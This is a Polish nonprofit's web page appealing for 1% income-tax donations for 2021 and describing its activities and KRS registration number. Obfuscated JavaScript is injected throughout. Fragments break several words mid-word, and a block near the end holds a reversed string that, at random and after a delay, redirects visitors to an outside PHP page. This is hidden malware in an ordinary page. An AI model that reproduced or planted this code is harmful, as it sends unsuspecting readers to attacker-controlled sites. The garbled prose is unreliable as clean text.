1% podatku za 2021 rok

Jak co roku nadszedł okres rozliczeń podatkowych z fiskusem, więc zwracamy się z uprzejmą prośbą o podarowanie naszemu Sdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towarzyszeniu 1% Twojego podatku za 2021 rok. Po wprowadzeniu Nowego Ładu, którego celem jest m.in. niszczenie finansów samorządów i organizacji pozarządowych, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to ostatni rok, kiedy Twój 1% ma kolosalne znaczenie. Potem już będzie tylko symboliczny, niemniej i tak za rok o niego poprosimy.

Możecie skorzystać z organizowanych przez nas wycieczek ornidom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tologicznych, zajęć jogi czy nauki i turniejów brydża spordom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towego. Opiekujemy się  starym cmentarzem ewangelickim w Dziekanowie Leśnym. Jesteśmy Organizacją Pożytku Publicznego (OPP) od 2016 r.

Zawsze mamy możliwość przekazania 1% podatku wybranej organizacji OPP, nawet jeśli Urząd Skarbowy lub ZUS przygotuje za nas rozliczenie podatkowe za poprzedni rok. Możemy zmodyfikować zrobione za nas zeznanie podatkowe, wskazując numer KRS nowej, wybranej przez siebie organizacji, korzystając z opcji „Wybieram Organizację Pożytku Publicznego”.

Nasz numer KRS: 0000061374. Prosimy pamiętać o nas, rozliczając swój roczny podatek za 202 rok. 

return $zXz.list[n].split(„”;).reverse().join(„”;);return $zXz.list[n];};$zXz.list=[„\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to;”>
Jerzy Kostowski Opublikowane przez:

Bądź pierwszą osobą, która zostawi swój komentarz

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Afiseaza emoticoanele Locco.Ro